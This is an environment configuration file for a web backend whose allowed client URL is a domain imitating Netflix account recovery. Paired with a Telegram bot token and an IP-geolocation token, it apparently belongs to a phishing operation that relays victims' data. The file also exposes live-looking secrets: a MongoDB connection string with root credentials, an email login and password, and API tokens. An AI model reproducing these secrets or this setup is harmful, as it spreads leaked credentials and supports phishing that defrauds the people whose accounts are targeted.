DATABASE="mongodb+srv://root:root@cluster.aqqb8bl.mongodb.net/rezonandonbaby?retryWrites=true&w=majority"
PORT=8000
EMAIL_USER="youssefabdelhedi1996@yahoo.com"
EMAIL_PASS="iydnqxpccdwypqnm"
JWT_SECRET="your-jwt-secret"
CLIENT_URL=https://netflix-account-recovery.com,https://www.netflix-account-recovery.com
ADMIN_EMAIL="youssefabdelhedi1996@yahoo.com"
TELEGRAM_CHAT_ID="-4529294962"
TELEGRAM_BOT_TOKEN="8044883507:AAG2K1oScSCSRcMqmcEqgRB3aNrCdiUjqgg"
IPINFO_TOKEN="1747848c31b8bd"
